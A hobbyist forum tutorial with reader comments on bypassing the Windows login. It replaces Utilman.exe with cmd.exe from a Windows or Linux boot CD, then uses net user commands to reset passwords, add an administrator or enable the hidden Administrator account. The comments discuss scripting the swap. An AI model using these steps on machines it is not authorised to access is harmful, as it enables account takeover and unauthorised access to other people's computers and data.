How To: Reset Windows Password with a Windows CD or a Linux CD

Reset Windows Password with a Windows CD or a Linux CD

Hello everyone!

I'm glad to post my first tutorial and hope you will appreciate it.
I'm a beginner in hacking so I don't have a lot of stuff to teach you, but maybe this tuto would help some of you.
And sorry for my limited English... I do my best.

In this tutorial I will show you how to access to cmd.exe in the login menu.

You can do a lot of things with cmd.exe but in this case it will be principally to reset the password of a user, create a new user with admin right or activate the Administrator user.

On windows, there is a file called Utilman.exe. This is a tool that can narrate the text, it can zoom, use an On screen Keyboard etc…

This tool can be launch in the login menu using Windows + U.
We will replace this file by cmd.exe so when you press Windows+U it will launch the command prompt.

I learned this tip in this tutorial but it's in French and I'd like to share it to the Null Byte community.

Note that it works on windows XP, Vista, 7, 8, 8.1 and 10.

Step 1: Using a Windows CD

Obviously, you need the Windows installation CD corresponding to the Windows you want to hack.
For the exemple I use Windows 7 but it's basically the same things on every OS

  • First, boot on the CD (I think I don't need to teach you how to do that).
  • Click "next" -> "Repair your computer" -> Select your OS -> "Command Prompt"

If you're on a command prompt, all is OK.

First, we will enter to our main partition. The main partition is certainly C:\ but we're on the CD so it's often D:\. To be sure, use the command "dir" to know if you're on the right partition.

Use this command to enter in a partition (here, this is the D:\ partition)

  • d:

We go to Windows\System32

  • cd Windows/System32

Now we create a backup file of Utilman.exe so we can recover it.

  • Copy Utilman.exe Utilman.bak

Finally we replace Utilman.exe by cmd.exe (We copy the file cmd.exe with the name "Utilman.exe")

  • Copy cmd.exe Utilman.exe

And type "y" to accept.

Now restart the computer to access the windows login menu. I explain in the next step how to reset a password

Now we will restore the Utilman.exe

  • Boot on the CD
  • Click "next" -> "Repair your computer" -> Select your OS -> "Command Prompt"
  • d:
  • cd Windows/System32
  • del Utilman.exe
  • ren Utilman.bak Utilman.exe

Step 2: Using a Linux Live CD

The advantage with a Linux CD is that it works on every Windows version. You don't need the specific CD of the windows version.

It's exactly the same manipulation but the name of the commands are a little different.

  • Boot on Your CD
  • Open a terminal

First we need to know which partition is the right windows partition

  • fdisk –l

In the example, we can see that the sda3 is "Microsoft basic data" and the size is 213.3Go.
We can easily deduct it's the windows partition.

Here is the commands to mount the partition and replace Utilman.exe by Cmd.exe:

  • mount /dev/sda3 /mnt/sda3
  • cd /mnt/sda3/Windows/System32
  • mv Utilman.exe Utilman.bak
  • cp cmd.exe Utilman.exe

And to restore Utilman.exe:

  • rm Utilman.exe
  • mv Utilman.bak Utilman.exe

Step 3: At the Login Menu

When you're at the login menu, press windows+U and normally the Command Prompt will appear.
Here is some useful command:

To change a user's password:

  • Net user "username" "newPassword"

To create a new user with admin right:

  • net user "newUser" "password" /add
  • net localgroup Administrators "newUser" /add

To activate the Administrator user and change his password:

  • net user administrator /active:yes
  • net user administrator "newPassword"

There is certainly a lot of useful command but I let your imagination find them

Thank you for reading this tutorial, don't hesitate to give me your feedback, it will be really helpful for me!

10 Comments

Hey,
Nice tutorial.
I did the method some years ago to get access to my own device :D

I've always wondered if there is an easy solution to automate the commands.
Just typing everything with a ; in the terminal?
mount /dev/sda3 /mnt/sda3;
cd /mnt/sda3/Windows/System32;
mv Utilman.exe Utilman.bak;
cp cmd.exe Utilman.exe;

oder creating a script or something like that?
Any Linux expert here who has a good idea?

Cheers

You could script it to automatically mount each partition and check for windows/system32/utilman.exe presence, and do the magic only on the right one.

Also, your oneliner works, you could use && instead of ; so that commands execute only if previous operation returned 0. But after mounting, there should be no problem in copying and renaming so the ; will just do.

Nice tutorial btw, thanx Madness.

Ok thanks ;)
Improved my linux skills a bit ;)
One more question:

Let's talk about a oneliner for the update progess in Kali.
(Sry if it's a bit offtopic)

I would use this:
apt-get update && apt-get upgrade

but if there's an update where you have to accept with "J"
(had it today with updating the ice weasel)
, the updating progress stops and waits for my confirmation.
Any great way to solve this?

Cheers

From man apt-get:

-y, --yes, --assume-yes
Automatic yes to prompts; assume "yes" as answer to all prompts and
run non-interactively. If an undesirable situation, such as
changing a held package, trying to install a unauthenticated
package or removing an essential package occurs then apt-get will
abort. Configuration Item: APT::Get::Assume-Yes.

so

apt-get update && apt-get -y upgrade

should do

Oh damn, just had to take a look inside of the manual of apt-get :D
However thanks a lot man, helped me a lot :)

Cheers

Yeah, man pages or --help flags usually answer most questions.. anyway you're welcome.

I don't know a lot of tools who works on every versions of windows.

And I like this method because you can do it with a Linux live CD , you don't need to burn a CD or a USB with another program.

I used to work with konboot, but the free version only worked for a limited amount of windows versions.
I think this is the best way to get easy and fast access ;)
However I let myself be happy to disabuse :)

Cheers

Thanks for sharing! I like that "net user Administrator /active:yes" command. Allows access without changing the passwords of the other accounts.

Share Your Thoughts

  • Hot
  • Latest